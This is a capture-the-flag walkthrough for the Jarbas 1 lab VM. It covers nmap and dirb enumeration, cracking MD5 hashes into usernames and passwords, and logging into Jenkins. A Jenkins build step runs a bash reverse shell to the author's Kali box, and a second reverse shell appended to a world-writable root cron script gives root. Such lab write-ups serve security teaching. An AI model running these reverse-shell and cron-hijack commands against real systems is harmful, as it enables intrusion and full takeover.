- VM: Jarbas 1
- Goal: Obtain root shell
- Approach: solve without automated exploitation tools
Target Discovery
nmap -sn 192.168.172.200-254
Port Scanning
nmap -p- -A 192.168.172.238
- Port 22: OpenSSH 7.4
- Port 80: Apache httpd 2.4.6
- Port 3306: mysql (MariaDB)
- port 8080: http (Jetty 9.4.z-SNAPSHOT)
Enumeration
First browse through the main website which found nothing of interests. All links are pointing to web.archive.org. robots.txt does not have any hidden directories.
Next look at the webserver at port 8080. It’s running Jenkins version 2.113 and requires login before you can do anything.
I tried some SQL injection techniques but looks like the login is not vulnerable to SQL injection.
I then checked the mysql connection to port 3306 but connection is not allowed.
Nothing so far. Then I run dirb and nikto against both web servers hopefully found something interestings. But unfortunately there’s no additional information from these scans.
Oh well, checked all ports without finding anything useful. I then proceed to look for any vulnerabilities against Apache 2.4.6, Jetty 9.4.z & Jenkins 2.113 using searchsploit and google. Tried several exploits to no availability.
Kinda got stuck. I went back to probe on the web servers to see if I overlooked something. Finally, got some extra information using dirb with -X flag.
dirb http://192.168.172.238 -X .php,.htm,.html
Exploitation
Check out access.html and sure I do found some interesting information.
All right. Looks like we get some usernames & password hashes. It’s 32 hex characters so looks like MD5 hashes. We found the passwords using online website md5decrypt.net.
- tiago: italia99
- trindade: marianna
- eder: vipsu
Nice, 3 passwords to use. First thing frist, try them on ssh port 22 to see if I’m lucky. Sure not. Then I proceed to try the usernames/passwords on website at port 8080. And eder/vipsu allows me to log in.
Jenkins is new to me so I browse around to see what’s available, particularly if I can upload files and execute them. When I look at Manage Jenkins > Configure System, there’s a setting for Shell executable. Seems like a good hint that I can execute some shell commands.
So I googled and researched more about Jenkins. Sure enough, I found out that the build process allows some shell execution. So I can make use of that to run a reverse shell.
- click New Item
- type any name at Enter an item name
- select Freestyle project
- click OK
It will create a new project and show project screen:
- scroll down to Build section
- click Add build step > Execute Shell
- enter command: /bin/bash -i >& /dev/tcp/192.168.172.110/4444 0>&1
- click Save
Note 192.168.172.110 is my kali box. Also, the target system does not have Netcat. Therefore, I am using bash reverse shell here. Now it’s time to get the reverse shell
- at kali box: run nc -lp 4444
- at browser: click Build Now
Boom! First foot in. The shell is a little hard to use as it will echo whatever characters I typed. But still got in, as user jenkins.
Privilege Escalation
Next step is to become root. I started looking around the system locating possible method of privilege escalation. sudo doesn’t work. no more passwords lying around. But crontab gave me the answer:
A cron job runs every 5 minutes is executing /etc/script/CleaningScript.sh as root. And /etc/script/CleaningScript.sh is world writable. Awesome.
All I need is to run another reverse shell in the CleaningScript.sh
- at kali box: start another Terminal
- at kali box: nc -lp 4443
- at limited shell: echo ” /bin/bash -i >& /dev/tcp/192.168.172.110/4443 0>&1 ” >> /etc/script/CleaningScript.sh
Once the reverse shell command is in the script, all we need is wait for a few minutes.
Capture the flag
Takeaway for me: use -X flag when doing dirb scan
Thank you Author Tiago Tavares for the box Jarbas: 1
